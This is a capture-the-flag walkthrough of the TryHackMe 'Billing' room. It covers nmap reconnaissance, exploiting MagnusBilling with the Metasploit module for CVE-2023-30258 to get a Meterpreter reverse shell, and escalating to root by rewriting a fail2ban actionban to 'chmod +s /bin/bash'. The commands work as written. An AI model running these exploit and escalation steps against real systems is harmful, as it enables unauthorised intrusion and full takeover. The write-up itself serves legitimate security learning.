CTF THM - Billing
CTF THM - Billing
TryHack3M: Bricks Heist
https://tryhackme.com/room/billing
At first we check for open Ports
1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(kali㉿kali)-[~]
└─$ nmap -p- 10.10.113.64
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-09 08:52 CET
Nmap scan report for 10.10.113.64
Host is up (0.035s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
5038/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 46.54 seconds
Parameter Breakdown
1. -p- (Scan All Ports)
- This option tells
nmapto scan all 65535 ports (from1to65535). - By default,
nmaponly scans the most common 1,000 ports unless specified otherwise. - This is useful for detecting services running on non-standard ports.
2. 10.10.113.64 (Target Hostname)
- The target being scanned.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
┌──(kali㉿kali)-[~]
└─$ nmap -A -p 22,80,3306,5038 10.10.113.64
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-09 08:53 CET
Nmap scan report for 10.10.113.64
Host is up (0.037s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 79:ba:5d:23:35:b2:f0:25:d7:53:5e:c5:b9:af:c0:cc (RSA)
| 256 4e:c3:34:af:00:b7:35:bc:9f:f5:b0:d2:aa:35:ae:34 (ECDSA)
|_ 256 26:aa:17:e0:c8:2a:c9:d9:98:17:e4:8f:87:73:78:4d (ED25519)
80/tcp open http Apache httpd 2.4.56 ((Debian))
| http-title: MagnusBilling
|_Requested resource was http://10.10.113.64/mbilling/
| http-robots.txt: 1 disallowed entry
|_/mbilling/
|_http-server-header: Apache/2.4.56 (Debian)
3306/tcp open mysql MariaDB 10.3.23 or earlier (unauthorized)
5038/tcp open asterisk Asterisk Call Manager 2.10.6
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X
OS CPE: cpe:/o:linux:linux_kernel:4.15
OS details: Linux 4.15
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 40.10 ms 10.21.0.1
2 40.20 ms 10.10.113.64
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.81 seconds
31. -A (Aggressive Scan Mode)
Includes multiple features:
- OS detection (
-O) - Version detection (
-sV, already included) - Script scanning (
-sC, already included) - Traceroute to analyze network routes
2. -p 22,80,3306,5038 (Port Specification)
Scans only the specified ports:
22(SSH)80(HTTP)3306(MySQL Database)5038(Asterisk Call Manager)
Now we know that there is a website running on port 80. Lets check in a browser.
=> There are not muchb informations but many websites keep the README.md file.
Here we see that it is ```MagnusBilling 7```
A short lookup at google and we see that there is a Remote Code execution for this version.
Lets try Metasploit...
```bash
msf6 > search magnusbilling
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258 2023-06-26 excellent Yes MagnusBilling application unauthenticated Remote Command Execution.
1 \_ target: PHP . . . .
2 \_ target: Unix Command . . . .
3 \_ target: Linux Dropper . . . .
Interact with a module by name or index. For example info 3, use 3 or use exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258
After interacting with a module you can manually set a TARGET with set TARGET 'Linux Dropper'
msf6 > use 0
[*] Using configured payload php/meterpreter/reverse_tcp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > show options
Module options (exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.ht
ml
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI /mbilling yes The MagnusBilling endpoint URL
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.
0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
When TARGET is 0:
Name Current Setting Required Description
---- --------------- -------- -----------
WEBSHELL no The name of the webshell with extension. Webshell name will be randomly generated if left unset.
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 PHP
View the full module info with the info, or info -d command.
Now, set the options and start out shell..
to stabilize the shell I used
1
python3 -c 'import pty;pty.spawn("/bin/bash")'
1
asterisk@Billing:/$ find / -type f -name "user.txt" 2>/dev/null
use cat /PATH/TO/user.txt and get the first flag.
get more privileges…
1
2
3
4
5
6
7
8
9
10
11
12
asterisk@Billing:/$ id
uid=1001(asterisk) gid=1001(asterisk) groups=1001(asterisk)
asterisk@Billing:/$ sudo -l
Matching Defaults entries for asterisk on Billing:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
Runas and Command-specific defaults for asterisk:
Defaults!/usr/bin/fail2ban-client !requiretty
User asterisk may run the following commands on Billing:
(ALL) NOPASSWD: /usr/bin/fail2ban-client
With the fail2ban-client command, it is possible to change the configuration of the fail2ban server. For more informations about fail2ban use google ;-P .
1
2
3
4
asterisk@Billing:/$ sudo fail2ban-client status
Status
|- Number of jail: 8
`- Jail list: ast-cli-attck, ast-hgc-200, asterisk-iptables, asterisk-manager, ip-blacklist, mbilling_ddos, mbilling_login, sshd
now we have the name of the Jail.
1
2
3
asterisk@Billing:/$ sudo fail2ban-client get asterisk-iptables actions
The jail asterisk-iptables has the following actions:
iptables-allports-ASTERISK
Let us modify the ban command which is a normal iptables command
1
2
3
asterisk@Billing:/$ sudo fail2ban-client get asterisk-iptables action iptables-allports-ASTERISK actionban
<iptables> -I f2b-ASTERISK 1 -s <ip> -j <blocktype>
asterisk@Billing:/$ sudo fail2ban-client set asterisk-iptables action iptables-allports-ASTERISK actionban 'chmod +s /bin/bash'
Now we ban an IP to triger the new command.
1
asterisk@Billing:/$ sudo fail2ban-client set asterisk-iptables banip 6.6.6.6
check the /bin/bash permissions.
1
2
asterisk@Billing:/$ ls -la /bin/bash
-rwsr-sr-x 1 root root 1234376 Mar 27 2022 /bin/bash
1
2
3
4
5
6
7
8
9
10
11
asterisk@Billing:/$ /bin/bash -p
/bin/bash -p
bash-5.1# id
id
uid=1001(asterisk) gid=1001(asterisk) euid=0(root) egid=0(root) groups=0(root),1001(asterisk)
bash-5.1# ls /root
ls /root
filename passwordMysql.log root.txt
bash-5.1# cat /root/root.txt
#cat /root/root.txt
THM{XXXXXXXXXX}
This post is licensed under CC BY 4.0 by the author.